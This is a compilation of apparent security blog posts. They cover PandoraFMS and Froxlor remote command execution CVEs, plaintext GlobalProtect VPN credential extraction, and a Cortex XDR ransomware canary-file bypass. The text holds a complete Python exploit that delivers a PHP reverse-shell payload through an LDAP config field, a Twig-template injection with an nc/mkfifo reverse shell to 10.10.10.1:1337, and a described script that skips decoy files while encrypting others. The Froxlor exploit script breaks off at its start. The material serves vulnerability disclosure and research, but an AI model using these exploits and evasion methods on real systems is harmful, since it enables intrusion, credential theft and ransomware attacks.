The values have been updated as expected, including the LDAP admin login, which now holds the value test.

Now we need to inject a payload that escapes the string passed to the shell_exec function and executes a command. To do that, let’s go back to the function where shell_exec is called:

if (!empty($ldap_admin_user)) {

$ldap_admin_user = " -D '".$ldap_admin_user."'";

}

if (!empty($ldap_admin_pass)) {

$ldap_admin_pass = ' -w '.escapeshellarg($ldap_admin_pass);

}

$dn = ' -b '.escapeshellarg($dn);

$ldapsearch_command = 'timeout '.$ldap_search_time.' ldapsearch -LLL -o ldif-wrap=no -o nettimeout='.$ldap_search_time.' -x'.$ldap_host.$ldap_version.' -E pr=10000/noprompt '.$ldap_admin_user.$ldap_admin_pass.$dn.$filter.$tls.' | grep -v "^#\|^$" | sed "s/:\+ /=>/g"';

$shell_ldap_search = explode("\n", shell_exec($ldapsearch_command));

foreach ($shell_ldap_search as $line) {

$values = explode('=>', $line);

if (!empty($values[0]) && !empty($values[1])) {

$user_attr[$values[0]][] = $values[1];

}

}

Our test value will be passed to $ldapsearch_command when we authenticate to PandoraFMS using the configured LDAP settings.

By examining the position of ldap_admin_user within the $ldapsearch_command string, we can see that it is possible to escape it by using an input similar to:

';Command #

Command will be the value of the ldap_admin_login POST parameter, which we previously sent as test. We can use something similar to the following payload to get a reverse shell:

';php -r '$sock=fsockopen("ATTACKERIP", ATTACKERPORT);exec("/bin/sh -i <&3 >&3 2>&3");' #

This should terminate the command string, append our command to it, and comment out the remainder of the string.
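To see why the quote, the semicolon and the trailing # matter, here is a small Python sketch that tokenizes the resulting command line roughly the way a POSIX shell would. It is an illustration under assumptions, not PandoraFMS code: the helper names are hypothetical, the payload is a harmless echo, and shlex.quote is used as a stand-in for PHP's escapeshellarg, which the vulnerable function applies to the password and base DN but not to the admin user.

```python
import shlex


def tokens(command):
    """Split a command line roughly the way a POSIX shell would."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def unsafe_bind_arg(user):
    # Mirrors the PHP concatenation: " -D '" . $ldap_admin_user . "'"
    return " -D '" + user + "'"


def safe_bind_arg(user):
    # shlex.quote plays the role that escapeshellarg plays in PHP.
    return " -D " + shlex.quote(user)


payload = "';echo INJECTED #"  # harmless stand-in for a real command

unsafe = tokens("ldapsearch -x" + unsafe_bind_arg(payload) + " -b 'dc=example'")
safe = tokens("ldapsearch -x" + safe_bind_arg(payload) + " -b 'dc=example'")

print(unsafe)  # the ';' shows up as its own token, followed by the injected command
print(safe)    # the whole payload stays inside a single argument
```

In the unsafe variant everything after the # is discarded as a comment, which is exactly why the rest of the original ldapsearch command no longer gets in the way.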

Updating ldap_admin_login to our payload should work without issues, as shown below:

Our payload was injected without issues; now we just need to trigger it by calling the function.

Triggering the payload

Now that we know how to update the configuration and inject our payload, the next step is figuring out how to trigger its execution.

Based on the previously analyzed authentication logic, we forced LDAP authentication through an earlier request. Next, we need to initiate an LDAP authentication process so that the vulnerable function uses our payload as the LDAP admin username, which will ultimately reach the vulnerable sink.

This can be achieved by attempting to log in with any username and password. The backend will process the login request using the stored LDAP settings, which will trigger the shell_exec call in the vulnerable function and execute our payload.

I will modify the payload again to:

';php -r '$sock=fsockopen("10.10.10.1", 1337);exec("/bin/sh -i <&3 >&3 2>&3");' #

And then try to log in with dummy credentials and see how it goes:

Awesome, we popped a shell!

To automate the process, including handling the initial authentication, CSRF token parsing, and other repetitive tasks, I developed the following exploit code:

#!/usr/bin/python3

# Exploit Title: Pandora v7.0NG.777.3 Remote Code Execution
# Date: 02/11/2024
# Exploit Author: Askar (@mhaskar01)
# CVE: CVE-2024-11320
# Vendor Homepage: https://pandorafms.org/
# Version: Version v7.0NG.777.3 Andromeda - FREE
# Tested on: Ubuntu 22.04 Server - PHP 8.0.29

import telnetlib
import requests
import socket
import sys
from threading import Thread
from bs4 import BeautifulSoup

if len(sys.argv) != 6:
    print("[+] Usage : ./exploit.py target username password ip port")
    exit()

target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = int(sys.argv[5])

payload = "';php -r '$sock=fsockopen(\"%s\", %s);exec(\"/bin/sh -i <&3 >&3 2>&3\");' #" % (ip, port)


def connection_handler(port):
    print("[+] Shell listener started on port %s" % port)
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", int(port)))
    s.listen(1)
    conn, addr = s.accept()
    print("[+] Connection received from %s" % addr[0])
    t.sock = conn
    print("[+] Heads up, incoming shellzzz!!")
    t.interact()


def login():
    request = requests.session()
    login_url = target + "/index.php?login=1"
    first_login_request = request.get(login_url)
    content = first_login_request.text
    soup2 = BeautifulSoup(content, "lxml")
    login_csrf_token = soup2.find_all("input", id="hidden-csrf_code")[0].get("value")
    login_info = {
        "nick": username,
        "pass": password,
        "login_button": "Let's go",
        "csrf_code": login_csrf_token
    }
    login_request = request.post(
        login_url,
        login_info,
        verify=False,
        allow_redirects=True
    )
    resp = login_request.text
    if "Login failed" in resp:
        print("[-] Login Failed")
        return False
    else:
        print("[+] Valid Session!")
        return request


def update_auth_to_ldap(request):
    update_auth_url = target + "/index.php?sec=general&sec2=godmode/setup/setup&section=auth"
    req = request.get(update_auth_url)
    content = req.text
    soup2 = BeautifulSoup(content, "lxml")
    login_csrf_token = soup2.find_all("input", id="hidden-csrf_code")[0].get("value")
    print("[+] Using Token %s" % login_csrf_token)
    update_auth_to_ldap_data = {
        "update_config":"1",
        "csrf_code": login_csrf_token,
        "auth":"ldap",
        "fallback_local_auth":"1",
        "fallback_local_auth_sent":"1",
        "ldap_server":"localhost",
        "ldap_port":"389",
        "ldap_version":"3",
        "ldap_start_tls_sent":"1",
        "ldap_base_dn":"ou%3DPeople%2Cdc%3Dedu%2Cdc%3Dexample%2Cdc%3Dorg",
        "ldap_login_attr":"uid",
        # payload
        "ldap_admin_login": payload,
        "ldap_admin_pass":"test",
        "ldap_search_timeout":"0",
        "secondary_ldap_enabled_sent":"1",
        "ldap_server_secondary":"localhost",
        "ldap_port_secondary":"389",
        "ldap_version_secondary":"3",
        "ldap_start_tls_secondary_sent":"1",
        "ldap_base_dn_secondary":"ou%3DPeople%2Cdc%3Dedu%2Cdc%3Dexample%2Cdc%3Dorg",
        "ldap_login_attr_secondary":"uid",
        "ldap_admin_login_secondary":"",
        "ldap_admin_pass_secondary":"",
        "double_auth_enabled_sent":"1",
        "2FA_all_users_sent":"1",
        "session_timeout":"90",
        "update_button":"Update",
        # this one will pass us to the vulnerable function
        "ldap_function":"local",
    }
    headers = {"Referer": update_auth_url}
    request2 = request.post(update_auth_url, update_auth_to_ldap_data, verify=False, headers=headers)
    resp = request2.text
    if "Correctly updated the setup options" in resp:
        print("[+] Injecting session value!")
        return True
    else:
        print("[-] Error while updating Auth logic!")
        return False


def trigger_payload():
    print("[+] Triggering payload!")
    handler_thread = Thread(target=connection_handler, args=(port,))
    handler_thread.start()
    login_url = target + "/index.php?login=1"
    first_login_request = requests.get(login_url)
    content = first_login_request.text
    soup2 = BeautifulSoup(content, "lxml")
    login_csrf_token = soup2.find_all("input", id="hidden-csrf_code")[0].get("value")
    login_info = {
        "nick": "BlaBla",
        "pass": "AnyThing",
        "login_button": "Let's go",
        "csrf_code": login_csrf_token
    }
    login_request = requests.post(
        login_url,
        login_info,
        verify=False,
        allow_redirects=True
    )


request = login()
if request:
    if update_auth_to_ldap(request):
        trigger_payload()

# Update auth by sending a first request to get the CSRF then send the full request

You can find it here too.

This is the final result after running the exploit code:

The vulnerability was addressed and assigned CVE-2024-11320 by PandoraFMS. The fix is included in version 777.5.

The post PandoraFMS v7.0NG.777.3 Remote Command Execution (CVE-2024-11320) appeared first on Shells.Systems.

The post Extracting Plaintext Credentials from Palo Alto Global Protect appeared first on Shells.Systems.

On a recent Red Team engagement, I was poking around having a look at different files and trying to see if I could extract any information that would allow me to move laterally through the network. I was hopeful, as always, that I would land on domain_admin_passwords_2024.xlsx or something (don’t laugh – we’ve all found that file at least once!). Unfortunately, this time, that file wasn’t present on the endpoint that I had landed on, so I had to settle for some Palo Alto Global Protect logs instead.

In C:\Users\username\AppData\Local\Palo Alto Networks\GlobalProtect there was a file called panGPA.log that contained something interesting:

It struck me as odd the way that the passcode and password were obfuscated. Why would they be different lengths? Surely, they wouldn’t have just replaced each character of the passcode/word with an asterisk? Because that would mean they would need to know the plaintext version – and there really isn’t a reason apart from pure laziness to do that.
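To make the worry concrete, here is a tiny Python sketch of the two masking styles. It assumes, as the log output suggests but does not prove, that the masking is done one asterisk per character; both helper names and the sample values are made up.

```python
def mask_per_character(secret):
    """Replace every character with '*', keeping the original length."""
    return "*" * len(secret)


def mask_fixed(secret):
    """Always emit the same placeholder, regardless of the input."""
    return "********"


for sample in ("123456", "CorrectHorseBatteryStaple"):  # made-up values
    print(len(mask_per_character(sample)), len(mask_fixed(sample)))
```

Per-character masking both leaks the length of the secret and implies that whatever wrote the log line had the plaintext in hand at that moment, which is the thread worth pulling on.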

With that in mind, it was time to fire up trusty x64dbg and see what is going on under the hood.

Assuming (I know, I know – but trust me, it’s not a huge mental leap this time) that panGPA.log was a log file for PanGPA.exe, we load that into our favourite debugger and have a look through some of the references.

Hmmm – let’s have a look at those shall we? Out of the three, this one looks the most interesting:

I picked this one as you can see the instruction to mov edx,0x2a, where 0x2a is the “*” character.

In fact – there are multiple references to mov edx,0x2a in this code section and searching for all instances of this command lands us generally in code sections that look like they are processing XML – which is exactly what we found in the log. Let’s go digging …

After _a lot_ of digging around we can start to put a picture together of what is happening. PanGPA ‘speaks’ to PanGPS over port 4767. It makes XML based requests and receives XML replies.

A typical response may look something like this:

<?xml version="1.0" encoding="UTF-8"?>
<response>
  <type>hello</type>
  <status>Connected</status>
  <protocol>IPSec</protocol>
  <portal-config-version>4100</portal-config-version>
  <error-must-show/>
  <error-must-show-level>error</error-must-show-level>
  <error/>
  <uptime>433</uptime>
  <byte-received>10495609</byte-received>
  <byte-sent>4743428</byte-sent>
  <packet-received>14169</packet-received>
  <packet-sent>9217</packet-sent>
  <incorrect-packet-received>0</incorrect-packet-received>
  <incorrect-packet-sent>0</incorrect-packet-sent>
  <server-ip>x.x.x.x</server-ip>
  <local-ip>y.y.y.y</local-ip>
  <local-ipv6/>
  <connect-mode>0</connect-mode>
  <product-version>6.2.4-652</product-version>
  <product-code>”{00243e9f-d787-4b07-a109-a1c885f2c032}”</product-code>
  <portal-status>Connected</portal-status>
  <user-name>[email protected]</user-name>
  <username-type>cc</username-type>
  <state>Connected</state>
  <check-version>no</check-version>
  <portal>express.gpcloudservice.com</portal>
  <discover-ready>yes</discover-ready>
  <mdm-is-enabled>no</mdm-is-enabled>
</response>
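If you capture one of these responses, pulling the fields out is straightforward. The following is a minimal Python sketch using only the standard library; the sample is a trimmed copy of the response above, and parse_response is a hypothetical helper of mine, not part of any Palo Alto tooling.

```python
import xml.etree.ElementTree as ET

# Trimmed copy of the response shown above.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<response>
  <type>hello</type>
  <status>Connected</status>
  <protocol>IPSec</protocol>
  <error/>
  <uptime>433</uptime>
  <product-version>6.2.4-652</product-version>
  <portal>express.gpcloudservice.com</portal>
</response>"""


def parse_response(xml_text):
    """Flatten the direct children of <response> into a tag -> text dict."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    # Empty elements such as <error/> have no text, so map them to "".
    return {child.tag: (child.text or "") for child in root}


fields = parse_response(SAMPLE)
for tag, value in fields.items():
    print(tag, "=", value)
```

A flat dictionary is enough here because the response has no nesting below the root element.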

Let’s start setting some breakpoints and see if we can build up a picture of what information flows back and forth between panGPA and panGPS. For now, let’s just focus on the * used for obscuring some of these details in the logs. Setting a breakpoint on every instance of this hits paydirt immediately:

Yeah … the red ones are a password in plaintext. The full XML response was located in memory and contained the username as well.

It was also possible to find the deactivation password and the uninstall password.

I cannot see how this is compliant with any current security framework such as NIST, FedRAMP etc. etc.

<rant>

Storing credentials in memory in plain text is such a basic security flaw – it leaves systems completely open to basic memory scraping or dump techniques to easily extract sensitive data, rendering any encryption efforts elsewhere irrelevant. It is negligent, it violates best practices, it disregards the principle of least privilege, and it creates an unnecessary attack surface that increases the risk of credential theft and subsequent lateral movement. In an age where memory attacks like Mimikatz are finally being retired, this sort of shoddy coding is inexcusable and reflects a deep misunderstanding of basic secure coding principles and threat mitigation.

The client is literally only speaking to the panGPS service and the Palo Alto endpoints. There is no reason AFAICT that this data ever needs to be in plaintext on the client endpoint apart from the very first time it is entered. Encrypt it dammit.

</rant>

With that rant out of the way, for our Red Team engagement, this was gold. The credentials to access the VPN were different than the ones used to log on to the machine – so now we had a second set of credentials for relay into the environment. Happy days indeed for us, less so for the client.

I have put together a proof of concept to demonstrate extracting these credentials from memory (focusing on username and password initially). The code can be found at https://github.com/t3hbb/PanGP_Extractor but basically we terminate the existing panGPA process, attach to a newly launched suspended panGPA process, set a breakpoint, resume, and then read the memory at RSI when the breakpoint is triggered.

Output looks like this :

It would be better, stealthier and generally cleaner if we spoke directly to panGPS itself and impersonated the panGPA client. This would eliminate stop/starting the VPN to extract data – total downtime is only a few seconds but still…

As always, any tips on improving the code/methodology gratefully received.


The post Cortex XDR Ransomware Protection, Chocolate Teapots and Inflatable Dartboards appeared first on Shells.Systems.

What do all of the above have in common? Let’s see, shall we?

Before we go any further, I should state that this vulnerability was reported to Palo Alto and it was determined that

“it does not impact the confidentiality, integrity, or availability of the agent. No agent updates or content updates will be created for this.”

This is true. The much vaunted CIA triangle for the agent remains unimpacted. It just makes it super easy to deploy ransomware on any systems ‘protected’ by Cortex XDR. Others have also found the knowledge of the canary files the last hurdle – see https://www.metabaseq.com/honey-i-bypassed-the-xdr-with-ransomware/

Onwards we go then – imagine you are a ransomware author, and when you pop GlobalCorp Inc you don’t want your attack caught early because you tried to encrypt one of those pesky canary/decoy files that some EDRs use to alert on.

It sounds good in principle, but how would you know which files are the decoys? Take Cortex for example (https://www.paloaltonetworks.co.uk/cortex/endpoint-detection-and-response) – it has a folder C:\ProgramData\Cyvera\Ransomware\<18 digit random number>\ where it stores these files. We can’t brute force the directory name and as a standard user we don’t have read permissions on the \Ransomware folder.

Figure 1. Pretty unlikely we are going to guess these files for exclusion

Turns out Cortex is doing something rather odd that lets you discover the files, but also the directory they are in so you can grab a handy list of files that you shouldn’t touch. Which is great if you are a ransomware author, not so great if you are relying on the canary files to save you.

I noticed this when I was doing some web app testing from a machine that had Cortex installed. I went to install one of my standard plugins for working with JWTs (https://github.com/PortSwigger/token-refresh <- shameless self promotion, sorry I never got it working for Mac) and hit the Burp Open File Dialog

Figure 2. I don’t remember downloading them!

What the heck are all those files? Checking in Explorer I see something completely different (source: trust me bro – I can’t show you that screenshot, too much identifying information).

Trying to figure out what they were, I fired up ProcMon and found a path :

Figure 3. So that is where you actually live

A little Googling took me to here : https://live.paloaltonetworks.com/t5/cortex-xdr-discussions/strange-files-malware/td-p/552442 where it was stated (by I believe an official Palo Alto employee) : “these are honeypot/decoy files deployed by cortex xdr agent to prevent against ransomware events. The methodology of ransomware detection of Cortex XDR is by the method of deploying honeypot files in different locations depending upon the mode and any attack which is vectored at file modification will be prevented when the attacker process touches any of these files.”

Great – OK, now we know what they are, I’m not being hacked by the Italians for my famously good creamy pasta recipe, we can stand down. But curious minds and all that. Let’s look at another directory and see if we see the same thing

My user folder

Figure 4. Nothing to see here

Looks all good – but what does Java see

Figure 5. Are you OK Java? You want to talk about it?

Why are they different? Different behaviour is good though, it gives us a reference to work from – find the differences, examine them and try and make something work. What about Explorer –

Figure 6. Again, nothing to see here

Hmmm – same as from the command line.

At this point, it looks like Cortex tried to hide the files from the user and I guess Java has a different methodology of accessing the directory structure (or there is no hook present to hide the files from it). I guess you could just take a command line output of all the files and pump it into the ransomware encrypter but it seems more elegant just to have an exclusion list, so let’s see if we can make one.

Let us have a peek and see if there are any other ways of spotting a difference. PowerShell perhaps?

Figure 7. Either we have decoy files, or Cortex has started reading my blog posts and then giving them a name …

Well that looks promising. We have a way of discovering files that do not exist from the command line but do from PowerShell. We can’t realistically be dropping ProcMon and interacting with files each time to figure out where they actually are, so let’s have a peek at the file properties

From within PowerShell, we can do a Get-Item <filename> | Format-List -Property * and have a look at the output

Figure 8. Hello there

Bingo. So all we need to do now is automate taking a directory listing of a place (or several) likely to contain canary files, once from the command line and again from PowerShell, look at the differences, and retrieve the Target properties for those files. Once we have a target directory, anyone can read the contents thanks to the Modify flag (I guess you need to be able to interact with them to trigger cyserver):

Figure 9. Properties for the Ransomware folder

Let’s do that in PowerShell – purely because that is much more likely to exist on a system and absolutely nothing to do with the fact that I can’t code for toffee in Java. The below script starts in the user folder and if nothing is found, continues to walk through common directories (downloads, documents etc) to see if it can find a difference

Figure 10. Tooling output
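The comparison at the heart of this is nothing more than a set difference between two views of the same directory. The real tooling is PowerShell; the Python below is only a sketch of that one step, with made-up listings and a hypothetical helper name.

```python
def hidden_entries(listing_a, listing_b):
    """Return names present in listing_b but missing from listing_a."""
    return sorted(set(listing_b) - set(listing_a))


# Made-up listings for illustration only.
cmd_listing = ["Desktop", "Documents", "Downloads"]
powershell_listing = [
    "Desktop",
    "Documents",
    "Downloads",
    "XORXOR_example.jpg",
    "ZZZZZ_example.sql",
]

print(hidden_entries(cmd_listing, powershell_listing))
```

Anything that appears in one view but not the other is worth a closer look, which is also a handy check for defenders wanting to confirm what an agent is hiding from users.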

It is worth noting however, for those eagle eyed amongst us, that not all of the links are one-to-one translations – i.e. you’re not going to find the same filenames in all of the locations – if we refer to the previous image :

Figure 11. Not 100% Mapping

Simple way around this – they all share the original file attributes and naming convention (first 5 characters are the same for multiple filetypes). There would be very little work involved in building a template to say ignore jpg files starting with XORXOR or sql files starting with ZZZZZ, or even just ignore pst files with a size of exactly 350000

Let’s see if we can make this a thing and hopefully show why I believe this to be important, even if the CIA of the agent itself is unaffected.

Let’s modify Honeypot.ps1 and instead of printing out the list of files found, let’s just feed that into an array of filetypes and filesizes – we can ignore the filename as we can see that that doesn’t always translate and this would be the easiest route to patch this attack vector. We can also ignore a lot of the files that come back with a zero byte file size – pointless encrypting those anyway.

The CIA_IS_OK script is just a simple check of files in a target directory to see if they match any of the known file types. If they do match, they are then checked for file size. If the file size does not match any of the files in the Cyvera\Ransomware folder then it is considered a viable candidate and encrypted. This script is slow and just XORs the target file with 0xBB so not true encryption as such, but enough to show that knowledge of the canary files is enough to not need to tamper with the CIA of the agent and achieve your goal.

All Scripts can be found on my GitHub : https://github.com/t3hbb/CortexCanary/

Figure 12. BuT ThE CiA oF ThE AgEnT iS Ok

Disclosure Timeline

- 07/06/2024 – Initial details disclosed to Palo Alto

- 07/06/2024 – Report acknowledged (D2LKJQ0GMJ) and triage started

- 12/06/2024 – Report forwarded to product team, internal ID CPATR-25032

- 11/07/2024 – Chased for further information

- 16/07/2024 – Responded indicating they were taking the final steps in the investigation

- 19/07/2024 – Deemed non-issue. No action will be taken


The post Froxlor v2.0.6 Remote Command Execution (CVE-2023-0315) appeared first on Shells.Systems.

Summary about Froxlor

Froxlor is a web-based server management software for Linux-based operating systems. It is primarily used to manage web hosting environments and allows users to create and manage websites, email accounts, and FTP accounts.

It also provides tools for monitoring server resources and managing backups. Froxlor is written in PHP and uses a MySQL database to store its data. It is open-source software and can be installed on a variety of Linux distributions, including Debian and Ubuntu.

About the vulnerability

Froxlor suffers from a bug that allows authenticated users to change the application log path to any location on the OS that the www-data user can write to, with no restrictions enforced by the backend. This makes it possible to write a malicious Twig template that the application will then render.

That leads to remote command execution as the www-data user.

In this blog post, we will trace the root cause of the bug and analyze why this issue happened, as well as which controls inside the application prevented us from exploiting this issue directly in other common cases.

Writing Log files

While auditing Froxlor, I came across the following interesting code snippet in lib/Froxlor/FroxlorLogger.php

if (self::$is_initialized == false) {

foreach (self::$logtypes as $logger) {

switch ($logger) {

case 'syslog':

self::$ml->pushHandler(new SyslogHandler('froxlor', LOG_USER, Logger::DEBUG));

break;

case 'file':

$logger_logfile = Settings::Get('logger.logfile');

// is_writable needs an existing file to check if it's actually writable

@touch($logger_logfile);

if (empty($logger_logfile) || !is_writable($logger_logfile)) {

Settings::Set('logger.logfile', '/tmp/froxlor.log');

}

self::$ml->pushHandler(new StreamHandler($logger_logfile, Logger::DEBUG));

break;

case 'mysql':

self::$ml->pushHandler(new MysqlHandler(Logger::DEBUG));

break;

}

}

self::$is_initialized = true;

}

}

This code snippet is responsible for writing Froxlor’s internal log files based on the log type. In the file case, the call to Settings::Get('logger.logfile') (line #103 in the original file) loads the log file path from a setting that we will analyze later; this only happens when the log type is file, and we will get back to this later too.

The path is then created using the touch function (line #105), after which a check (line #106) determines whether the file is writable. If it is not, the logfile setting is reset to /tmp/froxlor.log; otherwise, logs are written to the path stored in the $logger_logfile variable.

No action is taken to restrict the log file extension or its absolute path, which means we can write a .php file to any path we want, even inside the application document root, simply by controlling the value of the logger.logfile option.
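For contrast, this is roughly the kind of check that is missing. The Python sketch below is not Froxlor's actual fix: the allowed directory, the extension list and the function name are all assumptions chosen for illustration, and it only normalizes the path without resolving symlinks.

```python
import posixpath

ALLOWED_DIR = "/var/log/froxlor"   # hypothetical log directory
ALLOWED_EXTENSIONS = {".log"}      # hypothetical extension allowlist


def is_allowed_log_path(path):
    """Accept only absolute paths inside ALLOWED_DIR with an allowed extension."""
    if not path.startswith("/"):
        return False
    # normpath collapses ".." segments; it does not resolve symlinks.
    normalized = posixpath.normpath(path)
    inside = normalized.startswith(ALLOWED_DIR + "/")
    extension = posixpath.splitext(normalized)[1]
    return inside and extension in ALLOWED_EXTENSIONS


for candidate in (
    "/var/log/froxlor/froxlor.log",
    "/var/www/html/froxlor/test.php",
    "/var/log/froxlor/../../www/html/froxlor/test.log",
):
    print(candidate, is_allowed_log_path(candidate))
```

Either half of the check on its own (directory or extension) would already have blocked the paths used in the rest of this post.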

The variable logger.logfile is mapped as part of the logging group in the file actions/admin/settings/170.logger.php like the following:

'logger_logfile' => [

'label' => lng('serversettings.logger.logfile'),

'settinggroup' => 'logger',

'varname' => 'logfile',

'type' => 'text',

'string_type' => 'file',

'string_emptyallowed' => true,

'default' => '',

'save_method' => 'storeSettingField'

],

And after tracing where this variable is being submitted, I found that the page /froxlor/admin_settings.php?page=overview&part=logging will handle this variable like the following:

As we can see, logger_logfile and logger_logtypes are submitted to the page admin_settings.php?page=overview&part=logging.

So let’s see if we can control logger_logfile to drop a file in the document root at /var/www/html/froxlor/test.php.

To do that, we will simply change the previous Burp request and set logger_logfile to /var/www/html/froxlor/test.php:

As we can see, the data was submitted without issues in the body or the response code. Now let’s see whether the file was created.

Great, the file was created successfully on the disk.

Now we need to figure out a way to write data in this file, so the journey of auditing the logger continues now.

Writing the goodies!

Now that we control where the file is written, we need to write malicious PHP code into that fake log file. To do that, we go back to the logger and look for a point where we can trigger it to write data to the log file.

We will try to trigger one of the actions that gets logged to that file. During the analysis, I found that whenever an admin changes their Froxlor UI theme, the change is logged using a function called logAction.

And the following code in the file admin_index.php is responsible for performing that:



} elseif ($page == 'change_theme') {

if (isset($_POST['send']) && $_POST['send'] == 'send') {

$theme = Validate::validate($_POST['theme'], 'theme');

try {

Admins::getLocal($userinfo, [

'id' => $userinfo['adminid'],

'theme' => $theme

])->update();

} catch (Exception $e) {

Response::dynamicError($e->getMessage());

}

$log->logAction(FroxlorLogger::ADM_ACTION, LOG_NOTICE, "changed his/her theme to '" . $theme . "'");

Response::redirectTo($filename);

What we need to understand from this code is that it will validate the value of the variable $theme in case the page received a request to change the theme, the $theme variable will store the POST value of $_POST['theme'].

After that, a full string that contains the controlled $theme value is passed to the function logAction which will trigger the Logger to write the string to the file as LOG_NOTICE log type and as admin based on ADM_ACTION.

This is the code snippet of the function logAction:

public function logAction($action = FroxlorLogger::USR_ACTION, $type = LOG_NOTICE, $text = null)

{

// not logging normal stuff if not set to "paranoid" logging

if (!self::$crondebug_flag && Settings::Get('logger.severity') == '1' && $type > LOG_NOTICE) {

return;

}

if (empty(self::$ml)) {

$this->initMonolog();

}

if (self::$crondebug_flag || ($action == FroxlorLogger::CRON_ACTION && $type <= LOG_WARNING)) {

echo "[" . $this->getLogLevelDesc($type) . "] " . $text . PHP_EOL;

}

// warnings, errors and critical messages WILL be logged

if (Settings::Get('logger.log_cron') == '0' && $action == FroxlorLogger::CRON_ACTION && $type > LOG_WARNING) {

return;

}

$logExtra = [

'source' => $this->getActionTypeDesc($action),

'action' => $action,

'user' => self::$userinfo['loginname']

];

switch ($type) {

case LOG_DEBUG:

self::$ml->addDebug($text, $logExtra);

break;

case LOG_INFO:

self::$ml->addInfo($text, $logExtra);

break;

case LOG_NOTICE:

self::$ml->addNotice($text, $logExtra);

break;

case LOG_WARNING:

self::$ml->addWarning($text, $logExtra);

break;

case LOG_ERR:

self::$ml->addError($text, $logExtra);

break;

default:

self::$ml->addDebug($text, $logExtra);

}

}

This function takes the main logger stored in $ml and calls addNotice, based on the LOG_NOTICE log type passed earlier.

$ml is the Monolog Logger instance initialized in the code, which writes the passed string as a LOG_NOTICE entry to our malicious log path.
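The data flow is easy to reproduce outside of Froxlor. The sketch below swaps Monolog for Python's standard logging module, so it is an analogy rather than the real code path: the logger name and format string are made up, an in-memory stream stands in for the file named by logger.logfile, and INFO is used because Python has no NOTICE level.

```python
import io
import logging


def make_logger(stream):
    """Build a logger that writes formatted records to the given stream."""
    logger = logging.getLogger("froxlor-sketch")  # hypothetical logger name
    logger.handlers.clear()
    logger.setLevel(logging.DEBUG)
    logger.propagate = False
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    logger.addHandler(handler)
    return logger


def log_theme_change(logger, theme):
    # Same string concatenation as the logAction call in admin_index.php.
    logger.info("changed his/her theme to '" + theme + "'")


sink = io.StringIO()  # stands in for the file named by logger.logfile
log_theme_change(make_logger(sink), "FakeData")
print(sink.getvalue())
```

Whatever the user supplies as the theme name ends up inside the destination file, surrounded by a small amount of fixed text.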

And again as a reminder, to do that we just need to send the following request to change the theme name from this page:

And the following request shows how we wrote a fake theme name to the disk:

As we can see, we wrote the text FakeData to the PHP file, and now we are ready to write malicious PHP code.

Everything seems to be going great so far. Now let’s check whether the following code will be written to the file:

<?php phpinfo(); ?>

Unfortunately, the logger converted our text to HTML entities before writing it to the log file, which means we can’t write valid PHP code using the < or > characters.

After spending some time on this, I observed that the conversion is handled by the underlying logger, so we will not be able to write valid PHP code this way.

Abusing the log feature again!

So how can we bypass this issue? Going back to my notes, I noticed that the application uses the Twig template engine to render the UI, and that the templates live under templates/Froxlor/ with a .twig extension. So I thought I could write to a template that is used by the application, and make the logged “Fake Theme Name” a Twig expression that executes arbitrary commands.
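The reason this has a chance of working is that entity encoding targets angle brackets, while Twig delimiters are curly braces. The Python sketch below uses html.escape as an approximation of what the logger does to < and >; how the real logger treats quotes is not modeled here, and the Twig probe is a harmless arithmetic expression rather than the actual payload.

```python
import html

php_payload = "<?php phpinfo(); ?>"
twig_probe = "{{ 7 * 7 }}"  # harmless arithmetic expression, not the real payload

escaped_php = html.escape(php_payload, quote=False)
escaped_twig = html.escape(twig_probe, quote=False)

print(escaped_php)   # the PHP tags no longer contain literal < or >
print(escaped_twig)  # the Twig delimiters come through untouched
```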

We will write a new template templates/Froxlor/footer.html.twig which is already rendered by the application and we will inject the following Twig expression into it:

{{['COMMAND']|filter('exec')}}

This Twig expression passes the COMMAND string to the exec function; it’s a well-known Twig expression referenced on this page.

The expression should be filter-friendly and able to execute commands. To test that, I will use the following payload to get a reverse shell:
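As a rough mental model (this is not Twig itself), the filter filter calls the given callable once for every element of the array and keeps the elements for which it returns a truthy value. The simplified Python sketch below mimics that behaviour with a harmless recorder standing in for exec; twig_filter_model and fake_exec are hypothetical names used only for illustration.

```python
from typing import Callable, Iterable, List


def twig_filter_model(items: Iterable[str], callback: Callable[[str], object]) -> List[str]:
    """Call `callback` on every item and keep the items it approves of."""
    return [item for item in items if callback(item)]


executed: List[str] = []


def fake_exec(command: str) -> str:
    """Harmless stand-in for exec: record the command instead of running it."""
    executed.append(command)
    return ""  # pretend the command produced no output


kept = twig_filter_model(["COMMAND"], fake_exec)
print(executed)  # ['COMMAND']
print(kept)      # []
```

The filtered result is irrelevant to the attack; what matters is the side effect of the callable being invoked with attacker-controlled input.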

{{['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 1337 >/tmp/f']|filter('exec')}}

After submitting the payload to the application, we need to send a request to / or any other path that renders footer.html.twig, which is almost every page in the application.

Bringing it all together

So, in case you are lost, here is a recap of what we will do to test the payload and see if we can achieve full remote command execution:

- Change the log path to be /var/www/html/froxlor/templates/Froxlor/footer.html.twig

- Write the previously mentioned payload to the log file by changing the theme name via the theme change option, which triggers the log function to write the new theme “payload” to footer.html.twig

- Send a request to any path that will render footer.html.twig.

- Wait for the shell!

Let’s start with changing the log path:

Then let’s inject the payload into the log file:

And finally, let’s hit any page to get the payload rendered:

And we popped a shell!

Exploit Writing

After exploiting the bug, I wrote a full exploit that performs all of the steps mentioned above. As usual, I used Python, and this is the final exploit code:

#!/usr/bin/python3

# Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution
# Date: 2023-01-08
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2023-0315
# Vendor Homepage: https://froxlor.org/
# Version: v2.0.3
# Tested on: Ubuntu 20.04 / PHP 8.2

# Note: telnetlib was removed from the standard library in Python 3.13,
# so this script needs Python 3.12 or earlier.
import telnetlib
import requests
import socket
import sys
import warnings
from bs4 import BeautifulSoup
from threading import Thread

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')

if len(sys.argv) != 6:
    print("[~] Usage : ./froxlor-rce.py url username password ip port")
    sys.exit()

